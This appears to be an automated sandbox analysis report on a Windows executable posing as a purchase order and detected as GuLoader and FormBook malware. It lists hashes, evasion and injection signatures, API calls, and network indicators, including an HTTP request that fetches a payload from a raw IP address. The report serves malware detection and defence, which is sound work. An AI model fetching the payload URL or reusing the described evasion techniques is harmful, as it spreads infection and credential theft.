Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Purchase Order Purchase Order Purchase Order.exe

Overview

General Information

Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
Analysis ID:1557894
MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-18T18:11:16.708256+010028032702Potentially Bad Traffic192.168.2.849711185.222.57.9080TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeReversingLabs: Detection: 27%
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 185.222.57.90:80
      Source: global trafficHTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 185.222.57.90Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: global trafficHTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 185.222.57.90Cache-Control: no-cache
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450798080.0000000004910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.binlb
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348535C0 NtCreateMutant,LdrInitializeThunk,5_2_348535C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_34852C70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_34852DF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852B60 NtClose,LdrInitializeThunk,5_2_34852B60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34854650 NtSuspendThread,5_2_34854650
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853090 NtSetValueKey,5_2_34853090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853010 NtOpenDirectoryObject,5_2_34853010
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34854340 NtSetContextThread,5_2_34854340
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CA0 NtQueryInformationToken,5_2_34852CA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CC0 NtQueryVirtualMemory,5_2_34852CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CF0 NtOpenProcess,5_2_34852CF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C00 NtQueryInformationProcess,5_2_34852C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C60 NtCreateKey,5_2_34852C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DB0 NtEnumerateKey,5_2_34852DB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DD0 NtDelayExecution,5_2_34852DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D00 NtSetInformationFile,5_2_34852D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D10 NtMapViewOfSection,5_2_34852D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853D10 NtOpenProcessToken,5_2_34853D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D30 NtUnmapViewOfSection,5_2_34852D30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853D70 NtOpenThread,5_2_34853D70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852E80 NtReadVirtualMemory,5_2_34852E80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852EA0 NtAdjustPrivilegesToken,5_2_34852EA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852EE0 NtQueueApcThread,5_2_34852EE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852E30 NtWriteVirtualMemory,5_2_34852E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F90 NtProtectVirtualMemory,5_2_34852F90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FA0 NtQuerySection,5_2_34852FA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FB0 NtResumeThread,5_2_34852FB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FE0 NtCreateFile,5_2_34852FE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F30 NtCreateSection,5_2_34852F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F60 NtCreateProcessEx,5_2_34852F60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348539B0 NtGetContextThread,5_2_348539B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AB0 NtWaitForSingleObject,5_2_34852AB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AD0 NtReadFile,5_2_34852AD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AF0 NtWriteFile,5_2_34852AF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852B80 NtQueryInformationFile,5_2_34852B80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BA0 NtEnumerateValueKey,5_2_34852BA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BE0 NtQueryValueKey,5_2_34852BE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BF0 NtAllocateVirtualMemory,5_2_34852BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Windows\Fonts\Gullis.lnkJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00404C9E0_2_00404C9E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00406B150_2_00406B15
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004072EC0_2_004072EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70121B630_2_70121B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DF43F5_2_348DF43F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D24465_2_348D2446
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348114605_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E05915_2_348E0591
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BD5B05_2_348BD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348205355_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D75715_2_348D7571
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483C6E05_2_3483C6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DF7B05_2_348DF7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481C7C05_2_3481C7C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348117EC5_2_348117EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B7305_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348447505_2_34844750
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348207705_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF0CC5_2_348CF0CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D70E95_2_348D70E9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DF0E05_2_348DF0E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B20005_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E01AA5_2_348E01AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B1B05_2_3482B1B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D81CC5_2_348D81CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348101005_2_34810100
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BA1185_2_348BA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A81585_2_348A8158
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3485516C5_2_3485516C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F1725_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A05_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A02C05_2_348A02C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D2F05_2_3483D2F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C02745_2_348C0274
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E03E65_2_348E03E6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E3F05_2_3482E3F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D132D5_2_348D132D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D34C5_2_3480D34C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DA3525_2_348DA352
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C0CB55_2_348C0CB5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34810CF25_2_34810CF2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFCF25_2_348DFCF2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820C005_2_34820C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34839C205_2_34839C20
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482EC605_2_3482EC60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34838DBF5_2_34838DBF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482AD005_2_3482AD00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D1D5A5_2_348D1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D7D735_2_348D7D73
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34832E905_2_34832E90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DCE935_2_348DCE93
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34829EB05_2_34829EB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DEEDB5_2_348DEEDB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DEE265_2_348DEE26
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820E595_2_34820E59
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821F925_2_34821F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489EFA05_2_3489EFA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFFB15_2_348DFFB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812FC85_2_34812FC8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482CFE05_2_3482CFE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFF095_2_348DFF09
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34862F285_2_34862F28
